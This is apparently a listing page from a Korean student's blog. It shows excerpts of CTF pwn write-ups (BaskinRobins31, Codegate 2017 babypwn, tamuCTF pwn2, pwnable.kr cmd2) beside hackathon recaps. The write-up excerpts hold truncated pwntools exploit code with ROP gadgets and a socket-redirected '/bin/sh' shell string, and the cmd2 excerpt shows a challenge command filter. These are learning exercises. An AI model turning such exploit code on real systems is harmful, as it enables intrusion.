오래간만에 블로그에 포스팅은 하네요 ㅎㅎBaskinRobins31입니다. 12345678910111213141516171819202122232425262728293031323334353637383940from pwn import * r = process("./BaskinRobins31")e = ELF("./BaskinRobins31")l = e.libc write_plt = e.plt["write"]write_got = e.got["write"]read_plt = e.plt["read"]read_got = e.got["read"]bss = e.bss() + 16shell = "/bin/sh"pop_rdi_rsi_rdx = 0x000000000040087apop_rdi = 0x0000000000400bc3..

Digital Health Hackthon 2018 (10월 27~28일)어제 교내해커톤 끝나자마자 바로 해커톤에 참가해서 "장려상"을 수상했습니다. 처음에 너무 조용해서 한번 놀라고, 사람들께서 다들 정장 차림이셔서 두번 놀랐습니다. 이런 한 분야에 전문적인 해커톤은 처음이라 두렵기도하였고, 새로운 시도라는 의미로 참가하게되었습니다. 맨날 같이다니면서 수고하는 이승현 (SeungHyeon Lee) 안드개발하느라 수고한 이정재, 아이디어메이커(버스기사) 이종복, 기획같이해주면서 구체화한 이원동, ppt틀잡고 기획세밀하게 다듬어준 손채린. 다들 너무너무 수고하셨습니다.처음 기획이 인큐베이터속의 아이의 울음소리를 분석하는 프로젝트였지만, 멘토님들께 비판 폭탄을 받아서 당일날 처음부터 다 갈아엎었습니다.^^ ..

10월13일~10월14일에 Inapse 해커톤에 참가했습니다. 이번 해커톤으로 기존까진 하지못했던 많은 경험들을 하게 되었고, 정말 많은점들을 느꼈습니다 :) 팀명 : umbrella은 가는 말이 고와야 오는 말이 곱다, 저희의 언어 순화 솔루션인 “고고” 를 개발하였습니다. 맨날 같이다녀주면서 귀엽고 훌륭한 디자인을 해주는 이승현 (SeungHyeon Lee) 첫 해커톤인데도 너무너무 잘해준 조성진 혼자서 모든 웹개발을 다해준 박태훈, 너무너무 고맙고 다들 수고 많았어요~!! (crackup) 이정도로 완성된 프로젝트를 개발한적은 처음이라 팀원들한테 너무너무 고마웠던 대회였습니다.CTF하고 오느라 늦어서 미안해..

Codegate 2017 - babypwn 문제입니다. 카나리 익스 연습하려고 추천해주셔서 풀어봤습니다.원격으로 서버열어서 쉘따는 부분이 0>&4 1>&4 입출력 다 원격으로 바꾸는게 신기했습니다. 물론 저부분은 도움없었으면 못풀었을거에요 ㅠ 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950from pwn import * r = remote('127.0.0.1',6666)e = ELF('./babypwn') bss = 0x0804b1b8+0x32binsh = "/bin/sh 0>&4 1>&4"system_plt = e.plt['system']recv_plt = e.plt['recv']pppp..

tamuCTF pwn2문제입니다. 먼저 보호기법을 확인해보면 nx가 적용되어있는것을 볼 수 있습니다. ida32로 까보면 gets를 덮어서 ret를 아래주소로 향하게 해줍니다(cat flag.txt)인 주소 exploit이 쉬울거 같네요 ㅎㅎ아래와같이 payload작성해주고, 실행시켜주면? (grin)

이번 문제는 pwnable.kr - cmd2문제입니다.cmd1보다는 필터링이 상당히 많아져서 삽질좀 많이 했네여 123456789101112131415161718192021222324252627282930#include #include int filter(char* cmd){ int r=0; r += strstr(cmd, "=")!=0; r += strstr(cmd, "PATH")!=0; r += strstr(cmd, "export")!=0; r += strstr(cmd, "/")!=0; r += strstr(cmd, "`")!=0; r += strstr(cmd, "flag")!=0; return r;} extern char** environ;void delete_env(){ char** p; for(p..